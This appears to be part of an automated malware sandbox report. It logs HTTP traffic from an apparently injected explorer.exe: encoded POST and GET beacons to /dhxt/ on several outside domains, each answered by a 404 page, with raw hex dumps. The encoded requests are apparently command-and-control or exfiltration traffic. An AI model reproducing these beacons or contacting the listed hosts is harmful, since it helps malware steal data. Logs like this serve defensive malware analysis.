                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              3192.168.2.44969887.236.16.10780C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:38:39.050745964 CET132OUTPOST /dhxt/ HTTP/1.1
                                                                                                              Host: www.fildoor.store
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.fildoor.store
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.fildoor.store/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Raw: 55 6c 6b 41 48 6e 73 49 3d 78 74 41 6c 42 72 30 70 50 71 31 39 58 4a 31 62 7e 42 63 30 32 51 37 41 31 45 4b 64 35 6f 61 62 7e 63 6b 79 37 65 64 76 62 6f 70 76 77 77 62 63 5a 50 35 49 51 63 64 35 6b 68 71 52 79 57 32 70 61 78 77 45 4a 2d 4d 61 44 78 52 6f 6b 74 4b 48 76 41 35 39 55 38 55 56 47 38 55 5f 35 68 5a 78 69 77 48 41 6e 54 31 68 53 6a 69 42 50 51 4f 44 74 4c 6d 75 6c 34 32 5f 37 4f 4c 51 49 49 49 78 31 59 37 51 38 56 72 76 41 56 73 72 6b 41 74 69 7a 46 6b 50 32 75 75 6f 38 4e 7e 59 55 71 6c 4b 77 51 4f 79 72 69 57 57 55 2d 62 62 36 7a 61 79 6f 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: UlkAHnsI=xtAlBr0pPq19XJ1b~Bc02Q7A1EKd5oab~cky7edvbopvwwbcZP5IQcd5khqRyW2paxwEJ-MaDxRoktKHvA59U8UVG8U_5hZxiwHAnT1hSjiBPQODtLmul42_7OLQIIIx1Y7Q8VrvAVsrkAtizFkP2uuo8N~YUqlKwQOyriWWU-bb6zayog).
                                                                                                              Feb 6, 2023 14:38:39.139154911 CET133INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx-reuseport/1.21.1
                                                                                                              Date: Mon, 06 Feb 2023 13:38:39 GMT
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Data Raw: 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 bb 54 f0 30 04 74 db c5 85 ba 16 4d 0f 1e a3 99 25 85 da d4 24 6b f5 df 9b 76 11 bc 0c bc 99 6f 1e ef d1 45 f9 b4 55 af 4d 05 0f ea b1 86 a6 bd af f7 5b 58 5d 23 ee 2b b5 43 2c 55 79 be 6c 44 8e 58 1d 56 32 23 1b 3f 7a 49 96 b5 49 22 76 b1 67 59 e4 05 1c 5c 84 9d 3b 0d 86 f0 bc cc 08 17 88 de 9c f9 99 ff d6 f2 1f 93 54 46 a3 54 96 c1 f3 e7 89 43 64 03 ed 73 0d 93 0e 30 24 ee 38 73 e0 06 88 b6 0b 10 d8 7f b1 17 84 e3 ec e4 d3 d0 c6 78 0e 41 de 8d fa dd 32 6e 44 21 6e d6 70 d9 0e dd f7 15 bc 2c 38 e8 08 d3 34 89 63 d7 1b e7 bc 08 d1 79 86 c6 f9 08 b7 39 e1 9f 43 0a ba 44 4c a1 e6 6a d9 2f 2e dd 3c 88 15 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: e8MAK0`T0tM%$kvoEUM[X]#+C,UylDXV2#?zII"vgY\;TFTCds0$8sxA2nD!np,84cy9CDLj/.<0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              4192.168.2.44969987.236.16.10780C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:38:41.635281086 CET133OUTGET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=8voFCfVULodAC65O8zxk+Vq77CzX57WY/dJ15bldeZcww2bgGpUJFoE2xkKZjlmzbDc1YNM8KHZO1I2ZrlZ1XIcvUu8N2Hwmug== HTTP/1.1
                                                                                                              Host: www.fildoor.store
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Feb 6, 2023 14:38:41.724910975 CET134INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx-reuseport/1.21.1
                                                                                                              Date: Mon, 06 Feb 2023 13:38:41 GMT
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Content-Length: 277
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 31 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 69 6c 64 6f 6f 72 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Unix) Server at www.fildoor.store Port 80</address></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              5192.168.2.449700185.215.4.3680C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:38:46.801196098 CET135OUTPOST /dhxt/ HTTP/1.1
                                                                                                              Host: www.parkhomenko-zinaida.ru
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.parkhomenko-zinaida.ru
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.parkhomenko-zinaida.ru/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Raw: 55 6c 6b 41 48 6e 73 49 3d 4c 69 75 35 28 68 47 54 35 63 58 54 6f 30 63 65 31 4d 32 69 44 39 59 6e 41 59 71 52 74 35 56 74 4c 52 72 62 4a 35 47 7a 4b 6c 6d 72 61 4e 64 70 39 77 71 4c 71 45 28 44 56 30 39 69 77 72 73 5f 42 2d 74 55 48 59 47 50 52 79 77 47 65 6d 35 48 72 77 70 6f 38 4c 34 42 64 77 78 36 71 56 54 77 45 66 47 79 43 61 74 64 75 53 70 6d 6d 42 6b 75 54 48 46 71 49 64 75 57 5a 34 69 4b 36 7a 52 4b 77 4d 5a 6b 4c 63 44 78 6d 31 51 68 78 30 73 2d 6a 48 35 56 51 36 7e 39 5a 49 31 6c 48 43 76 56 4c 64 49 4d 51 58 58 31 53 55 41 57 66 59 76 4e 79 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: UlkAHnsI=Liu5(hGT5cXTo0ce1M2iD9YnAYqRt5VtLRrbJ5GzKlmraNdp9wqLqE(DV09iwrs_B-tUHYGPRywGem5Hrwpo8L4Bdwx6qVTwEfGyCatduSpmmBkuTHFqIduWZ4iK6zRKwMZkLcDxm1Qhx0s-jH5VQ6~9ZI1lHCvVLdIMQXX1SUAWfYvNyw).
                                                                                                              Feb 6, 2023 14:38:46.911653996 CET136INHTTP/1.1 404 Not Found
                                                                                                              Server: ddos-guard
                                                                                                              Connection: close
                                                                                                              Set-Cookie: __ddg1_=sjr8VH2kl98dTS0k7bsN; Domain=.parkhomenko-zinaida.ru; HttpOnly; Path=/; Expires=Tue, 06-Feb-2024 13:38:46 GMT
                                                                                                              Date: Mon, 06 Feb 2023 13:38:46 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Content-Length: 340
                                                                                                              Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                              ETag: "154-56d5bbe607fc0"
                                                                                                              Accept-Ranges: bytes
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                              Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              6192.168.2.449701185.215.4.3680C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:38:49.344099998 CET137OUTGET /dhxt/?UlkAHnsI=GgGZ8XnpwcXWt0AEsp/4OdJSGPmAlrgxEwmnAr+KMWurQo94+Qn94Sj3VSd8nLdkKuBNUoOidT9aHFNGgyN51vgfDTNlsm7YLA==&2ani-=qhGAdkIKoH HTTP/1.1
                                                                                                              Host: www.parkhomenko-zinaida.ru
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Feb 6, 2023 14:38:49.411067009 CET138INHTTP/1.1 404 Not Found
                                                                                                              Server: ddos-guard
                                                                                                              Connection: close
                                                                                                              Set-Cookie: __ddg1_=XE0fV0UMErmDXLjU52G3; Domain=.parkhomenko-zinaida.ru; HttpOnly; Path=/; Expires=Tue, 06-Feb-2024 13:38:49 GMT
                                                                                                              Date: Mon, 06 Feb 2023 13:38:49 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Content-Length: 340
                                                                                                              Upgrade: h2,h2c
                                                                                                              Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                              ETag: "154-56d5bbe607fc0"
                                                                                                              Accept-Ranges: bytes
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                              Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              7192.168.2.449702199.192.28.12180C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:38:56.982057095 CET139OUTPOST /dhxt/ HTTP/1.1
                                                                                                              Host: www.dezella.xyz
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.dezella.xyz
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.dezella.xyz/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Raw: 55 6c 6b 41 48 6e 73 49 3d 39 5a 6e 48 63 48 41 46 59 6d 4d 70 55 58 62 31 78 49 62 4e 69 41 75 4d 47 6a 50 36 46 54 44 31 51 42 33 42 7a 53 39 52 55 6a 71 58 47 4d 6b 47 71 4d 77 33 44 52 44 65 4f 79 47 65 59 76 6b 53 6f 32 6e 47 79 5a 76 69 56 64 73 41 71 59 69 48 30 47 48 67 4c 56 75 31 49 43 6c 6e 58 33 39 56 71 6f 79 63 37 6a 30 47 71 33 38 56 7a 42 74 4d 56 61 6c 31 59 30 41 38 78 33 6e 62 34 63 70 55 6b 75 63 2d 56 70 6e 54 53 50 57 78 55 51 72 5f 5a 44 39 79 52 54 4d 6d 68 54 39 68 5a 49 4d 64 64 2d 37 77 73 56 44 55 70 71 30 50 38 6d 50 69 4d 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: UlkAHnsI=9ZnHcHAFYmMpUXb1xIbNiAuMGjP6FTD1QB3BzS9RUjqXGMkGqMw3DRDeOyGeYvkSo2nGyZviVdsAqYiH0GHgLVu1IClnX39Vqoyc7j0Gq38VzBtMVal1Y0A8x3nb4cpUkuc-VpnTSPWxUQr_ZD9yRTMmhT9hZIMdd-7wsVDUpq0P8mPiMg).
                                                                                                              Feb 6, 2023 14:38:57.244018078 CET140INHTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:38:57 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 16026
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 33 38 30 2e 38 35 37 2c 33 34 36 2e 31 36 34 63 2d 31 2e 32 34 37 2c 34 2e 36 35 31 2d 34 2e 36 36 38 2c 38 2e 34 32 31 2d 39 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.651-4.668,8.421-9.196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8
                                                                                                              Feb 6, 2023 14:38:57.244077921 CET142INData Raw: 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37 35 36 2d 32 2e 38 32 2c 33 2e 31 38 31 2d 34 2e 38 36 38 2c 36 2e 30 38 38 2d 35 2e 31 33 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 36 2e
                                                                                                              Data Ascii: .66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.164z" /> </clipPath> <
                                                                                                              Feb 6, 2023 14:38:57.244131088 CET143INData Raw: 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 64 3d 22 0a 09 09 09 4d 34 38 33 2e 39 38 35 2c 31 32 37 2e 34 33 63 32 33 2e 34 36 32 2c 31 2e 35 33
                                                                                                              Data Ascii: ="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig"> <g>
                                                                                                              Feb 6, 2023 14:38:57.244169950 CET144INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72
                                                                                                              Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" /> </g> <g>
                                                                                                              Feb 6, 2023 14:38:57.244204044 CET146INData Raw: 20 78 32 3d 22 34 38 39 2e 35 35 35 22 20 79 32 3d 22 33 30 38 2e 31 32 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30
                                                                                                              Data Ascii: x2="489.555" y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945" x2="493.473" y2="303.945" /> </g>
                                                                                                              Feb 6, 2023 14:38:57.244237900 CET147INData Raw: 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74
                                                                                                              Data Ascii: y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="190.277" y1="411.146" x2="182.44" y2="411.146" /> </g>
                                                                                                              Feb 6, 2023 14:38:57.244271040 CET148INData Raw: 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22
                                                                                                              Data Ascii: oke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="429.522" cy="201.185" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
                                                                                                              Feb 6, 2023 14:38:57.244304895 CET150INData Raw: 30 45 30 36 32 30 22 20 63 78 3d 22 31 33 30 2e 36 39 33 22 20 63 79 3d 22 33 30 35 2e 36 30 38 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36
                                                                                                              Data Ascii: 0E0620" cx="130.693" cy="305.608" r="2.651" /> <circle fill="#0E0620" cx="480.296" cy="477.014" r="2.651" /> </g> </g> <g id="spaceman" clip-path="url(cordClip)"> <path id="co
                                                                                                              Feb 6, 2023 14:38:57.244343042 CET151INData Raw: 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33
